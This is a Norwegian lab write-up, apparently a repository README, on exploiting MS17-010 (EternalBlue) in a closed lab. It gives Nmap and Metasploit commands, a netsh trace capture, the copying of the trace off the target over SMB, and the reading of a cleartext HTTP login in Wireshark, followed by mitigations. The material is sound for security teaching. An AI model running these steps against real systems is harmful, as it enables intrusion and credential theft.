MS17-010 (EternalBlue) + nettverksspor — lab

Denne laben demonstrerer en helhetlig sikkerhetstest i et lukket miljø:

1. identifikasjon av sårbar SMBv1 / MS17-010,
2. utnyttelse-flyt (funn → modulvalg → kjøring),
3. innsamling av nettverksspor på Windows med netsh trace,
4. eksport/konvertering til PCAP og analyse i Wireshark som viser en HTTP-innlogging i klartekst.

Etikk: Dette er kun en kontrollert demo i eget labnett. Ikke test mot systemer du ikke eier eller har eksplisitt tillatelse til. Maskér alltid sensitive verdier (brukernavn, passord, tokens, interne IP-er).

---

Overblikk

Angriper (Kali) – IP

Intern webapp – landingsside

Intern webapp – innlogget oversikt

Windows (mål/klient) – oversikt

Mål med øvelsen

• Verifisere sårbarhet: Påvise MS17-010 på målmaskinen.
• Utnytte kontrollert: Demonstrere at sårbarheten kan gi kjøring/skall i lab.
• Fange bevis: Samle Windows-nettverksspor (ETL), eksportere og konvertere til PCAP/PCAPNG.
• Analysere risiko: Vise at en HTTP-pålogging kan leses i klartekst i Wireshark.

Miljø og verktøy

• Angriper: Kali Linux
• Mål/klient: Windows med SMBv1 aktivert (sårbar for MS17-010)
• Øvrig: Windows-VM som besøker webappen
• Verktøy: Nmap, Metasploit, netsh trace, etl2pcapng, editcap, Wireshark

---

A) Kartlegging og sårbarhetsindikasjon

Nmap MS17-010 (NSE) – sårbar vert oppdaget

nmap --script smb-vuln* -p 445 192.168.x.x

Metasploit i gang + modulvalg (EternalBlue)

msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.x.x

---

B) Innsamling av nettverksspor på Windows

Start sporing med netsh trace (ETL)

netsh trace start capture=yes tracefile=C:\50309\net_trc.etl level=verbose

Stopp og lagre sporet

netsh trace stop

Hvorfor netsh trace? Det er innebygd i Windows og egner seg når du ikke kan installere Wireshark på målmaskinen. Det produserer en .etl som må konverteres før analyse i Wireshark.

---

C) Hente ut og konvertere spor

Eksfiltrer ETL-filen fra Windows
(her via SMB fra Kali – andre sikre metoder fungerer også)

smbclient //192.168.x.x/50309 -U Administrator
get net_trc.etl

Konverter .etl → .pcapng (Windows)

.\etl2pcapng.exe C:\...\net_trc.etl C:\...\net_trc.pcapng

(Valgfritt) .pcapng → .pcap for kompatibilitet

editcap -F pcap ~/Desktop/net_trc.pcapng ~/Desktop/net_trc.pcap

---

D) Analyse i Wireshark

Filtrer på HTTP og finn POST-forespørselen. I denne labben går trafikken ukryptert (ingen TLS), og innloggingsdataene fremstår derfor i klartekst.

Leseguide:

• Øverst: HTTP-pakker (200/302/POST).
• Midt: Hypertext Transfer Protocol-panelet med POST-felter (brukernavn/pass).
• Høyre: hex-visning (ikke nødvendig å vise i klartekst dersom passord sladdes).

---

Hvorfor teknikken virker (kort forklaring)

• MS17-010 / EternalBlue utnytter en feil i SMBv1 som muliggjør fjernkodekjøring.
• netsh trace fanger nettverks-I/O på verts-siden til en ETL. Med etl2pcapng (og ev. editcap) kan sporet åpnes i Wireshark.
• HTTP uten TLS innebærer at brukernavn og passord kan leses i klartekst i nettverkssporet.

---

Forsvar og avbøtende tiltak

Host / OS

• Deaktiver SMBv1 og patch MS17-010 (oppdater OS).
• Begrens administrative delinger/tilganger; prinsippet om minste privilegium.

Nettverk

• Segmentér SMB til nødvendige soner; blokker uautorisert 445/tcp på tvers av segmenter.
• Overvåk signaturer/indikatorer relatert til EternalBlue.

Applikasjon / Bruker

• Tving HTTPS (TLS) for all pålogging.
• Innfør passordhygiene og MFA; detekter uvanlige innloggingsmønstre.

---

Reproduser (høydenivå)

1. Kartlegg SMB på mål, bekreft MS17-010-indikasjon (Nmap NSE).
2. Kjør en kontrollert utnyttelse i lab (Metasploit-flyt).
3. Start netsh trace, gjenskape en legitim brukerhandling (HTTP-login), stopp sporet.
4. Eksporter ETL, konverter til PCAP/PCAPNG, åpne i Wireshark og dokumentér funn.

Tips: Maskér sensitive verdier i skjermbilder før publisering av repoet.

Lisens

MIT